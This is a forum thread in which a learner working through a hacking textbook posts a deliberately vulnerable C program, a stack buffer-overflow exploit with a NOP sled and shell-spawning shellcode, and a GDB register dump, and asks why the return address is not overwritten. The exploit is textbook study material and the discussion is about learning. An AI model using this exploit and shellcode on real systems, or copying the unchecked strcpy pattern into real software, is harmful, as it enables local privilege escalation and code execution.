Results 1 to 5 of 5

Thread: DEP in BT3? exploit

  1. #1
    Junior Member
    Join Date
    May 2007
    Posts
    82

    Default DEP in BT3? exploit

    I'm practicing coding an exploit from a book in currently working through (Hacking the art of exploitation)

    Now there's a program in the book thts vulnerable to a stack overflow. The other program is the exploit tht takes advantage of the program by shuffling data into the buffer with the bytecode. Now the problem is i can understand some parts of the program. But when i compile both the vulnerable program and exploit it doesnt seem to wanna spit out a shell. Now i've written vulnerable
    program and tried to overwrite the EIP and i've looked at GDB now i cannot seem to over right the register. Now i know there're programs tht do additional checks on the EIP, and processors now are armed with DEP even tho i've disabled it in the BIOS and still i cannot over right the EIP. I've updated the BT3 Kernel to 2.6.24 and i'm not too sure if the latest kernel does do additional checks on the EIP.

    All i wanna know is there a way to know if anything like DEP has been enabled on my system?

    Thanks people

  2. #2
    Senior Member ShadowKill's Avatar
    Join Date
    Dec 2007
    Posts
    908

    Default

    Can you provide us with the source of your vuln-program/exploit/shellcode so we may see if theres simply a coding/scripting error?



    "The goal of every man should be to continue living even after he can no longer draw breath."

    ~ShadowKill

  3. #3
    Junior Member
    Join Date
    May 2007
    Posts
    82

    Default

    yea sure.

    the program....

    #include<stdio.h>
    #include<string.h>

    int main(int argc, char *argv[])
    {
    char buffer[5];
    strcpy(buffer, argv[1]);
    return 0;
    }


    the exploit....

    #include <stdlib.h>

    char shellcode[] =
    "\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\ x5b\x31\xc0"
    "\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\ x4b\x08\x8d"
    "\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\ x6e\x2f\x73"
    "\x68";

    unsigned long sp(void) // This is just a little function
    { __asm__("movl %esp, %eax");} // used to return the stack pointer

    int main(int argc, char *argv[])
    {
    int i, offset;
    long esp, ret, *addr_ptr;
    char *buffer, *ptr;

    offset = 0; // Use an offset of 0
    esp = sp(); // Put the current stack pointer into esp
    ret = esp - offset; // We want to overwrite the ret address

    printf("Stack pointer (ESP) : 0x%x\n", esp);
    printf(" Offset from ESP : 0x%x\n", offset);
    printf("Desired Return Addr : 0x%x\n", ret);

    // Allocate 600 bytes for buffer (on the heap)
    buffer = malloc(600);

    // Fill the entire buffer with the desired ret address
    ptr = buffer;
    addr_ptr = (long *) ptr;
    for(i=0; i < 600; i+=4)
    { *(addr_ptr++) = ret; }


    // Fill the first 200 bytes of the buffer with NOP instructions
    for(i=0; i < 200; i++)
    { buffer[i] = '\x90'; }

    // Put the shellcode after the NOP sled
    ptr = buffer + 200;
    for(i=0; i < strlen(shellcode); i++)
    { *(ptr++) = shellcode[i]; }

    // End the string
    buffer[600-1] = 0;

    // Now call the program ./vuln with our crafted buffer as its argument
    execl("./vuln", "vuln", buffer, 0);

    // Free the buffer memory
    free(buffer);

    return 0;
    }
    .

    I've compiled them both and when i try to run the exploit all i get is segmentation violation which is understandable. When i put the program in gdb and send loads if 'A's this is what i get.

    (gdb) info registers
    eax 0x0 0
    ecx 0x41414141 1094795585
    edx 0xbfa2e532 -1079843534
    ebx 0xb7f5fff4 -1208614924
    esp 0x4141413d 0x4141413d
    ebp 0x41414141 0x41414141
    esi 0xb7f95ce0 -1208394528
    edi 0x0 0
    eip 0x8048389 0x8048389 <main+53> <not overritten even after 100+ 'A's>
    eflags 0x210286 [ PF SF IF RF ID ]
    cs 0x73 115
    ss 0x7b 123
    ds 0x7b 123
    es 0x7b 123
    fs 0x0 0
    gs 0x33 51

    what i was talking about DEP or summat else begin enabled is 'wrong' :-p. Cause i managed to make a program tht instead of taking in an argument it copies a buffer into another buffer thts in a function, i can understand how i can over right the return address and i'm copying a buffer into another buffer using a function in which the EIP is overwritten.

    Its jus tht program above i got from tht book i cannot seem to get working.

    Thanks for your help.

    I hope i've provided enough information to solve the problem

  4. #4
    Senior Member ShadowKill's Avatar
    Join Date
    Dec 2007
    Posts
    908

    Default

    Okay, i'll take a better look at this in a minute but first, are you sure that your shellcode contains no 'null' characters (0)? Because if so, that will register as a stop and exit the program.....



    "The goal of every man should be to continue living even after he can no longer draw breath."

    ~ShadowKill

  5. #5
    Junior Member
    Join Date
    May 2007
    Posts
    82

    Default

    Nal it doesn't contain NULL characters. I'm just wondering why it doesn't work as NOP (x90) code are being fed into the the buffer with the return address and the shell code but even still the the shell code doesn't wanna execute even tho the exploit is using the NOP method to execute the shellcode. I'm gonna have a look at it more. I shall get back to ya if i find a'way to the shellcode to work. Thanks for your help tho!!!!

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •